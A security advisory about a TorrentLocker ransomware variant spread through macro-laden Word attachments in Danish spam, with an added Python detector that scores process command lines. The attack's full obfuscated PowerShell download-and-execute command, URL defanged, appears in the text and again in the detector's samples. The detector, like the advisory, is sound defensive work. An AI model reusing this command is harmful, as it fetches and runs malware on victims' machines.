Security Alert: New TorrentLocker Variant Targets Denmark in Ransomware Attacks
This new ransomware strain will also steal your usernames and passwords
Two large spam waves swept across Denmark in the past 5 days. Both carry the notorious TorrentLocker ransomware and feature a few new tricks.
Unsuspecting users are tricked into opening a Microsoft Word document in which the criminals embedded a malicious macro.
If the victim clicks through the document's prompts ("Enable Editing" takes the file out of Protected View, "Enable Content" lets the macro run), the macro executes a PowerShell command that downloads ransomware from the TorrentLocker family.
The encrypting malware is fetched with an HTTP GET from the following URL (sanitized for your protection):
*.js2-order[.]pl/file/set.rte
This is the complete PowerShell command line, with the random casing the attackers use to evade simple string matching (sanitized for your protection):
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe PowerShell.exe -ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden (New-Object SYSTEm.nEt.wEBCLIent).DoWnlOAdFILE('http://48f4339.js2-order[.]pl/file/set.rte','C:\Users\[%userprofile%]\AppData\Roaming.EXE'); Start-process 'C:\Users\[%userprofile%]\AppData\Roaming.exe'
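As an added example (this is not code from the original alert, nor tooling from CSIS or Heimdal), here is a small Python detector that scores process-creation command lines for the download-and-execute cradle quoted above. It normalises casing and quotes before matching, so the attacker's random capitalisation of switches and method names does not defeat the patterns, and it additionally treats that odd casing as a signal of its own. The indicator list, weights, threshold and the three sample command lines are constructed for this example; the first sample mirrors the command quoted above with the URL kept defanged.

```python
import re

# Indicators typical of a PowerShell download-and-execute cradle such as the
# one in the alert. Applied to the lower-cased command line; each hit adds
# its weight. Weights and threshold are illustrative choices, not tuned data.
INDICATORS = [
    (r"-executionpolicy\s+bypass", 2, "ExecutionPolicy Bypass"),
    (r"-noprofile", 1, "NoProfile"),
    (r"-windowstyle\s+hidden", 2, "WindowStyle Hidden"),
    (r"new-object\s+(system\.)?net\.webclient", 2, "Net.WebClient created"),
    (r"\.downloadfile\s*\(", 3, "DownloadFile call"),
    (r"start-process\s+", 2, "Start-Process of the downloaded file"),
    (r"\\appdata\\roaming\S*\.exe", 3, "executable under AppData\\Roaming"),
    (r"https?://", 1, "remote URL"),
]
ALERT_THRESHOLD = 6
MAX_NATURAL_CASE_CHANGES = 3  # PascalCase names such as -ExecutionPolicy stay at or below this


def normalise(cmdline):
    """Lower-case the command line, collapse whitespace and replace the
    typographic quotes that copy-paste and log exporters often introduce."""
    for bad, good in (("\u2018", "'"), ("\u2019", "'"), ("\u201c", '"'), ("\u201d", '"')):
        cmdline = cmdline.replace(bad, good)
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def case_changes(token):
    """Number of upper/lower transitions between consecutive letters."""
    letters = [c for c in token if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def oddly_cased_tokens(cmdline):
    """Switches, cmdlets and member names whose casing flips more often than
    PascalCase would (e.g. -ExecutIoNPOlICy). Paths and URLs are skipped
    because their mixed case is natural."""
    odd = []
    for tok in re.split(r"""[\s()'",;]+""", cmdline):
        if re.fullmatch(r"[-.]?[A-Za-z][A-Za-z.-]*", tok) and case_changes(tok) > MAX_NATURAL_CASE_CHANGES:
            odd.append(tok)
    return odd


def analyse(cmdline):
    """Score one process-creation command line. Returns the matched indicator
    descriptions, the oddly cased tokens, the total score and whether it
    crosses the alert threshold."""
    norm = normalise(cmdline)
    hits, weight = [], 0
    for pat, w, desc in INDICATORS:
        if re.search(pat, norm):
            hits.append(desc)
            weight += w
    odd = oddly_cased_tokens(cmdline)      # casing is checked on the raw line
    score = weight + len(odd)              # one extra point per obfuscated token
    return {"hits": hits, "odd_tokens": odd, "score": score,
            "alert": score >= ALERT_THRESHOLD}


# Constructed sample command lines (not real telemetry). The first mirrors the
# cradle quoted in the alert; the URL is kept defanged.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "
    r"-ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden "
    r"(New-Object SYSTEm.nEt.wEBCLIent).DoWnlOAdFILE("
    r"'http://48f4339.js2-order[.]pl/file/set.rte',"
    r"'C:\Users\[%userprofile%]\AppData\Roaming.EXE'); "
    r"Start-process 'C:\Users\[%userprofile%]\AppData\Roaming.exe'",
    r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
]


def analyse_all(cmdlines=SAMPLE_CMDLINES):
    return [analyse(c) for c in cmdlines]


if __name__ == "__main__":
    for cmd, result in zip(SAMPLE_CMDLINES, analyse_all()):
        flag = "ALERT" if result["alert"] else "ok   "
        print(flag, result["score"], cmd[:60])
        for h in result["hits"]:
            print("        +", h)
        for t in result["odd_tokens"]:
            print("        ~ oddly cased:", t)
```

In practice the command lines would come from Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1. Note that the benign administrative samples score well below the threshold even though they share one or two switches with the cradle; it is the combination of a hidden, profile-less, policy-bypassing shell, a WebClient download, an immediate Start-Process and a payload path under AppData\Roaming that makes the pattern distinctive.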
TorrentLocker immediately injects itself into the explorer.exe process.
This TorrentLocker variant adds two capabilities:
- it harvests usernames and passwords from the infected computer;
- it can spread to other computers through shared files.
Antivirus detection is still low: 3/55 on VirusTotal.
These spam waves are very aggressive, so be extra cautious about what reaches your inbox and evaluate carefully which emails you open. A similar spam wave that also spreads TorrentLocker still has a rather low detection rate, 19/56 on VirusTotal, even four days after it was discovered.
There is a tool that can decrypt data locked by some TorrentLocker variants, but it has not been tested on this new variant yet.
Stay safe!
*This article features cyber intelligence provided by CSIS Security Group researchers.